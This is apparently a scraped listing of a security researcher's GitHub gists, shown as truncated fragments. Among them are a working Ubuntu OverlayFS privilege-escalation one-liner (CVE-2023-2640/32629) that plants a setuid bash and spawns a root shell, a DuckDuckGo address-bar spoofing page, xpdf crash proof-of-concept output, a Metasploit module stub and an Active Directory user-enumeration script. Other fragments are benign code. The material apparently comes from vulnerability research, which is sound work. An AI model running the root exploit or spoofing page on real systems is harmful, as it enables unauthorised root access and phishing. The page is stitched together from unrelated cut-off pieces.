This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ldapPath = "LDAP://DC=corp,DC=inputzero,DC=io" | |
| $filter = "(&(objectClass=user)(objectCategory=person))" | |
| $searcher = New-Object System.DirectoryServices.DirectorySearcher | |
| $searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry($ldapPath) | |
| $searcher.Filter = $filter | |
| $searcher.PropertiesToLoad.Add("cn") > $null | |
| $searcher.PropertiesToLoad.Add("samAccountName") > $null | |
| $searcher.PropertiesToLoad.Add("mail") > $null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")' | |
| # Ref - https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/main/exploit.sh |
RootUp
/ spoof.html
Last active
October 29, 2022 16:30
DuckDuckGo Address Bar Spoofing - CVE-2019-12329
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html><body> | |
| <title>DuckDuckGo — Privacy, simplified.</title> | |
| <head><style> | |
| p.b { | |
| font-family: Arial, Helvetica, sans-serif; | |
| } | |
| </style></head><p class="b"><body bgcolor="#5DBCD2"> | |
| <h1 style="text-align:center;">We defintiely store your <br> personal information. Ever.</h1> | |
| <p style="text-align:center;">Our privacy policy is simple: we collect and share any of your personal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xpdf v3.04 | |
| PoC: https://gofile.io/?c=QEDJrA | |
| $ gdb ./pdfinfo | |
| (gdb) run poc.pdf | |
| Starting program: /home/input0/Downloads/xpdf-3.04/xpdf/pdfinfo poc.pdf | |
| Syntax Error: Couldn't read xref table | |
| Syntax Warning: PDF file is damaged - attempting to reconstruct xref table... | |
| Syntax Error (895): Illegal character <2f> in hex string | |
| Syntax Error (896): Illegal character <50> in hex string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| xpdf v2.0 | |
| PoC: https://gofile.io/?c=grUzbG | |
| $ gdb ./pdfinfo | |
| (gdb) run out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971 | |
| Starting program: /home/input0/Downloads/xpdf-2.00/xpdf/pdfinfo out/crashes/id:000000,sig:11,src:000000,op:flip1,pos:2971 | |
| Error (2978): Dictionary key must be a name object | |
| Error (2980): Dictionary key must be a name object | |
| Error (2982): Dictionary key must be a name object | |
| Error (2989): Dictionary key must be a name object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Corpus for fuzzing VIM regex engine. | |
| Ref: https://github.com/vim/vim/commit/ec66c41d84e574baf8009dbc0bd088d2bc5b2421 | |
| a*b\+\|[0-9]\|\d{1,9} | |
| [\S\s] | |
| ^[-a-z0-9~!$%^&*_=+}{\'?]+(\.[-a-z0-9~!$%^&*_=+}{\'?]+)*@([a-z0-9_][-a-z0-9_]*(\.[-a-z0-9_]+)*\.(aero|arpa|biz|com|coop|edu|gov|info|int|mil|museum|name|net|org|pro|travel|mobi|[a-z][a-z])|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(:[0-9]{1,5})?$ | |
| ^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$ | |
| ^[0-9]{4}-(((0[13578]|(10|12))-(0[1-9]|[1-2][0-9]|3[0-1]))|(02-(0[1-9]|[1-2][0-9]))|((0[469]|11)-(0[1-9]|[1-2][0-9]|30)))$ | |
| ^[0-9]{4}([- /.])(((0[13578]|(10|12))\1(0[1-9]|[1-2][0-9]|3[0-1]))|(02\1(0[1-9]|[1-2][0-9]))|((0[469]|11)\1(0[1-9]|[1-2][0-9]|30)))$ | |
| ^(((0[13578]|(10|12))/(0[1-9]|[1-2][0-9]|3[0-1]))|(02/(0[1-9]|[1-2][0-9]))|((0[469]|11)/(0[1-9]|[1-2][0-9]|30)))/[0-9]{4}$ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PR130 | |
| var is_banned = false; | |
| function show_loader(show) { | |
| if (show) { | |
| $("#code").hide(); | |
| $("#code_bgd").hide(); | |
| $("#loader").show(); | |
| } else { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| class MetasploitModule < Msf::Auxiliary | |
| include Msf::Exploit::Remote::HttpServer | |
| def run | |
| exploit # start http server | |
| end | |
| def setup | |
| @html = %| | |
| JS goes here! |
RootUp
/ AppLockMain.xml
Created
February 11, 2019 18:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <android.support.design.widget.CoordinatorLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" app:layout_behavior="@string/appbar_scrolling_view_behavior" | |
| xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://schemas.android.com/apk/res-auto"> | |
| <FrameLayout android:layout_width="fill_parent" android:layout_height="fill_parent"> | |
| <LinearLayout android:orientation="vertical" android:background="@color/white" android:layout_width="fill_parent" android:layout_height="fill_parent"> | |
| <LinearLayout android:orientation="vertical" android:id="@id/ll_title_lock_setting" android:background="@color/feature_setting_background" android:visibility="gone" android:layout_width="fill_parent" android:layout_height="wrap_content"> | |
| <LinearLayout android:orientation="horizontal" android:paddingTop="@dimen/y4" android:layout_width="fill_parent" android:layout_height="wrap_content"> | |
| <TextView and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://github.com/aria2/aria2/blob/37368130ca7de5491a75fd18a20c5c5cc641824a/src/HttpConnection.cc | |
| std::string result; | |
| std::string line; | |
| while (getline(istr, line)) { | |
| if (util::startsWith(line, "Authorization: Basic")) { | |
| result += "Authorization: Basic ********\n"; | |
| } | |
| else if (util::startsWith(line, "Proxy-Authorization: Basic")) { | |
| result += "Proxy-Authorization: Basic ********\n"; | |
| } |
NewerOlder